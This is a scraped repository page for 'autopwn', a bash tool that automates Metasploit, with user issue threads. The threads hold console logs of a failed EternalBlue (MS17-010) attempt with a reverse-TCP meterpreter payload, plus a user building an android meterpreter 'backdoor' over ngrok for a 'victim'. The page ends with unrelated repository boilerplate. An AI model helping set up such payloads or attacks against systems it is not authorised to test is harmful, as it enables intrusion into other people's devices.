rpranshu / autopwn Goto Github PK
View Code? Open in Web Editor NEWA simple bash based metasploit automation tool!
Home Page: https://rpranshu.github.io/Autopwn/
License: Other
A simple bash based metasploit automation tool!
Home Page: https://rpranshu.github.io/Autopwn/
License: Other
The following options failed to validate: Value '$vip' is not valid for opti on 'RHOST'.
[-] Exploit failed: The following options failed to validate: RHOST.
[*] Exploit completed, but no session was created.
/opt/metasploit-framework/embedded/lib/ruby/gems/2.4.0/gems/activesupport-4.2.10 /lib/active_support/core_ext/kernel/agnostics.rb:7:in ``': Cannot allocate memor y - infocmp (Errno::ENOMEM)
from /opt/metasploit-framework/embedded/lib/ruby/gems/2.4.0/gems/actives upport-4.2.10/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``'
from /opt/metasploit-framework/embedded/lib/ruby/gems/2.4.0/gems/rb-read line-0.5.5/lib/rbreadline.rb:1815:in `get_term_capabilities'
from /opt/metasploit-framework/embedded/lib/ruby/gems/2.4.0/gems/rb-read line-0.5.5/lib/rbreadline.rb:2027:in `_rl_init_terminal_io'
from /opt/metasploit-framework/embedded/lib/ruby/gems/2.4.0/gems/rb-read line-0.5.5/lib/rbreadline.rb:2564:in `readline_initialize_everything'
from /opt/metasploit-framework/embedded/lib/ruby/gems/2.4.0/gems/rb-read line-0.5.5/lib/rbreadline.rb:3849:in `rl_initialize'
from /opt/metasploit-framework/embedded/lib/ruby/gems/2.4.0/gems/rb-read line-0.5.5/lib/rbreadline.rb:4868:in `readline'
from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/input/ readline.rb:162:in `readline_with_output'
from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/input/ readline.rb:100:in `pgets'
from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell. rb:375:in `get_input_line'
from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell. rb:191:in `run'
from /opt/metasploit-framework/embedded/framework/lib/metasploit/framewo rk/command/console.rb:48:in `start'
from /opt/metasploit-framework/embedded/framework/lib/metasploit/framewo rk/command/base.rb:82:in `start'
from /opt/metasploit-framework/bin/../embedded/framework/msfconsole:49:i n `<main>'
[] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
RHOST => 10.100.128.93
LHOST => 10.100.130.180
PAYLOAD => windows/x64/meterpreter/reverse_tcp
[-] Handler failed to bind to 10.100.130.180:4444:- -
[] Started reverse TCP handler on 0.0.0.0:4444
[] 10.100.128.93:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.100.128.93:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[] 10.100.128.93:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.100.128.93:445 - The target is vulnerable.
[] 10.100.128.93:445 - Connecting to target for exploitation.
[+] 10.100.128.93:445 - Connection established for exploitation.
[+] 10.100.128.93:445 - Target OS selected valid for OS indicated by SMB reply
[] 10.100.128.93:445 - CORE raw buffer dump (38 bytes)
[] 10.100.128.93:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[] 10.100.128.93:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[] 10.100.128.93:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 10.100.128.93:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[] 10.100.128.93:445 - Trying exploit with 12 Groom Allocations.
[] 10.100.128.93:445 - Sending all but last fragment of exploit packet
[-] 10.100.128.93:445 - Errno::ECONNRESET: Connection reset by peer
[] Exploit completed, but no session was created.
This err is same to ms17_101_eternalblue in msf. I guess rhost have open FW or AV. What can I attack?
Hi brother i like alot your tool but wend i was testing it with ngrok to build meterpreter backdoor after the build is done ti gives me 0 bytes server ... can you fix that ?
thanks in advance
Now choose your victim`s OS
Press 1 for android
or
Press 2 for windows
1
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10233 bytes
payload $payload created successfully in
/Autopwn
starting the $payload handler.....
This copy of metasploit-framework is more than two weeks old.
Consider running 'msfupdate' to update to the latest version.
[*] Using configured payload generic/shell_reverse_tcp
LHOST => $ipad
LPORT => 4444
[-] The value specified for PAYLOAD is not valid.
[-] Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.